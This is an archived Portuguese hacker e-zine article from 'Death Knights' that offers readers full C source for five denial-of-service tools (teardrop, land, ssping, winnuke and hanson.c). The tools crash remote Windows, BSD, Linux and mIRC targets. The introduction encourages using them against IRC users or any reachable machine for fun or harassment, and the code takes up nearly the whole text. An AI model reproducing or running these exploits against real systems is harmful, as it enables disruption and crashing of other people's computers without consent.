Copy Link
Add to Bookmark
Report
PHUN STUFF TO USE @ iRC!
Death Knights Issue 1
by Cacaio
O iRC e' feito basicamente para o chat, mas as vezes voce encontra alguem que voce quer sacanear por la', ou so por diversao... e nao sabe o que fazer. Mas agora direi alguns metodos de como voce se divertir! Os codigos seguintes podem ser feito tanto com alguem no iRC quanto com qualquer maquina que voce saiba que esta na net...
SUBSECOES:
- TEARDROP
- LAND
- SSPING
- WINNUKE
- HANSON
TEARDROP
O teardrop e' um codigo que aproveita o bug de fragmentacao de iP encontrado nas kernels de Linux mais antigas, WinNT 4.0, Win95 e outros... O codigo seguinte pode ser usado tanto em Linux quanto em FreeBSD. Vamos ao codigo...
[teardrop.c]
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
/*
* Copyright (c) 1997 route|daemon9 <route@infonexus.com> 11.3.97
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000
#define IPH 0x14
#define UDPH 0x8
#define PADDING 0x1c
#define MAGIC 0x3
#define COUNT 0x1
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;
fprintf(stderr, "teardrop route|daemon9\n\n");
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);
if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
name);
exit(0);
}
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
LAND
Este e' bem divertido... hehehe... o que acontece? Voce manda um pacote com o SYN vindo de um host, em uma porta aberta que mandara para ela mesma o pacote, entrando em loop e paralisando a maquina! A pena e' que se o usuario tiver paciencia para esperar 100 segundos, a maquina voltara a funcionar (valeu Sabrina!).
Lista dos OS's vulneraveis:
- BSDI 2.1
- FreeBSD 2.2.2-RELEASE
- FreeBSD 2.2.5-RELEASE
- FreeBSD 2.2.5-STABLE
- FreeBSD 3.0-CURRENT
- HP-UX 10.20
- MacOS 8.0
- NetBSD 1.2
- NeXTSTEP 3.0
- NeXTSTEp 3.1
- OpenBSD 2.1
- Solaris 2.5.1
- SunOS 4.1.4
- Windows 95
- Windows NT
E aqui o codigo!
[land.c]
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
/* land.c by m3lt, FLC
crashes a win95 box */
#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
for(i=0;i<(length>>1);i++)
value+=data[i];
if((length&1)==1)
value+=(data[i]<<8);
value=(value&65535)+(value>>16);
return(~value);
}
int main(int argc,char * * argv)
{
struct sockaddr_in sin;
struct hostent * hoste;
int sock;
char buffer[40];
struct iphdr * ipheader=(struct iphdr *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
struct pseudohdr pseudoheader;
fprintf(stderr,"land.c by m3lt, FLC\n");
if(argc<3)
{
fprintf(stderr,"usage: %s IP port\n",argv[0]);
return(-1);
}
bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;
if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(stderr,"unknown host %s\n",argv[1]);
return(-1);
}
if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(stderr,"unknown port %s\n",argv[2]);
return(-1);
}
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(stderr,"couldn't allocate raw socket\n");
return(-1);
}
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=sizeof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->ttl=255;
ipheader->protocol=IP_TCP;
ipheader->saddr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_addr.s_addr;
tcpheader->th_sport=sin.sin_port;
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
{
fprintf(stderr,"couldn't send packet\n");
return(-1);
}
fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);
close(sock);
return(0);
}
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
SSPING
Super Sized PiNG... precisa dizer mais algo? :)
(ah, funciona em Windows e em algumas versoes do MacOs)
[ssping.c]
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
void banner(void) {
printf("\nSSPING 1.0\n");
printf("by Datagram.\n\n");
}
void usage(const char *progname) {
printf("usage :\n");
printf("%s ...\n",progname);
printf(" < spoof > : address of ICMP packet sender\n");
printf(" < dest > : destination of the ICMP packet\n");
printf(" < number > : number of bomb to send\n\n");
}
int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);
if (addr->sin_addr.s_addr == -1) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"ERROR: Unable to resolve host %s\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
int send_winbomb(int socket,
unsigned long spoof_addr,
struct sockaddr_in *dest_addr) {
unsigned char *packet;
struct iphdr *ip;
struct icmphdr *icmp;
int rc;
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct icmphdr) + 8);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
ip->ihl = 5;
ip->version = 4;
// ip->tos = 0;
ip->id = htons(34717);
ip->frag_off |= htons(0x2000);
// ip->tot_len = 0;
ip->ttl = 255;
ip->protocol = IPPROTO_ICMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum(ip, sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 0;
icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1);
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + 1,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
ip->frag_off = htons(8 >> 3);
ip->frag_off |= htons(0x2000);
ip->check = in_cksum(ip, sizeof(struct iphdr));
icmp->type = 0;
icmp->code = 0;
icmp->checksum = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + 8,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
return(0);
}
int main(int argc, char * *argv) {
struct sockaddr_in dest_addr;
unsigned int i,sock;
unsigned long src_addr;
banner();
if ((argc != 4)) {
usage(argv[0]);
return(-1);
}
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
fprintf(stderr,"ERROR: Opening raw socket.\n");
return(-1);
}
if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
src_addr = dest_addr.sin_addr.s_addr;
if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }
printf("%s: Sending packets.\n",argv[0]);
for (i = 0;i < atoi(argv[3]);i++) {
if (send_winbomb(sock,
src_addr,
&dest_addr) == -1) {
fprintf(stderr,"ERROR: Sending packet.\n");
return(-1);
}
usleep(10000);
}
}
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
WiNNUKE
Whooommm....[bocejo]... este eh o treco que manda OOB pro Windows e ele trava com uma tela azul... pra win95 porta 139 e pra nt porta 59...
[killwin.c]
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int x, y, sockdesc, port = 139, hits = 1;
char *target, *str = "Later.";
void parse_args(int argc, char *argv[]);
void usage(char *progname) {
printf("Usage: %s <target> [-p port (Default 139)] [-t hits (Default 1)]\n", progname);
exit(-1);
}
void parse_args(int argc, char *argv[]) {
target = argv[1];
if (argv[1][0] == '-') {
printf("Must specify a target.\n");
exit(-1);
}
for(y=2;y<argc;y++) {
if (!strcmp(argv[y], "-p")) { y++; port = atoi(argv[y]); }
if (!strcmp(argv[y], "-t")) { y++; hits = atoi(argv[y]); }
}
}
void main(int argc, char *argv[]) {
struct sockaddr_in sin;
struct hostent *he;
if (argc < 2) usage(argv[0]);
parse_args(argc, argv);
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
he = gethostbyname(argv[1]);
if (he) {
memcpy((caddr_t)&sin.sin_addr.s_addr, he->h_addr, he->h_length);
} else {
perror("Resolving");
}
sockdesc = socket(AF_INET, SOCK_STREAM, 0);
if (sockdesc < 0) {
perror("socket");
exit(-1);
}
if (connect(sockdesc, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect");
close(sockdesc);
exit(-1);
}
printf("Connected to [%s:%d].\n", target, port);
printf("Sending crash %d times...\n", hits);
for (x=0;x<hits;x++) send(sockdesc, str, strlen(str), MSG_OOB);
sleep(1);
printf("Done....\n");
close(sockdesc);
exit(0);
}
HANSON
O hanson.c e' somente um codigozinho que usa uma falha de portas deixada pelo mIRC 5.3... voce deve usar com a porta do cara. Use a 113 ou a 69. Have fun! :)
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
/* hanson.c - by myn with help from h2o and watcher *thanks*
This lil program exploits mIRC's bound sockets, making the client crash
mIRC can handle a mass influx of data but cannot handle strings of data
that are parsed internally through mIRC. This program forces mIRC to
parse incoming data and identify it, the result from the parse
is larger then mIRC's buffer string size, thus making the
client crash :). This will create 5 connections to the bound port and
then send the string.
Its like sending double "int" when you only had 1 bit to work with!
hanson.c is dedicated to all the lil 13 to 16 year old geeks (abyss)
that are in love with those cute boys..
myn@efnet
*/
/* FILE GOT IN THE DEATH KNIGHTS! www.deathknights.com */
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
int x, s, i, p, dport;
/* SET STRING HERE */
char *str = "9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 * 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999";
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);
if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
perror("gethostbyname()");
return(-3);
}
}
if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
perror("connect()");
close(sock);
return(-4);
}
printf(" Connected to [%s:%d].\n",server,port);
return;
}
void main(int argc, char *argv[]) {
int t;
if (argc != 3) {
printf("hanson.c - myn@efnet\n\n");
printf("This lil program exploits mIRC's bound sockets, making the client crash\n\n");
printf("Usage: %s <target> <port>\n",argv[0]);
exit(0);
}
printf("hanson.c - myn@efnet\n\n");
for (t=0; t<5; t++)
{
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}
p = atoi(argv[2]);
open_sock(s,argv[1],p);
printf(" Sending string 1ooo times to %s port %i... \n", argv[1], p);
for (i=0; i<1000; i++) {
send(s,str,strlen(str),0x0);
}
printf("mmmmb0p.\n");
}
close(s);
}
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
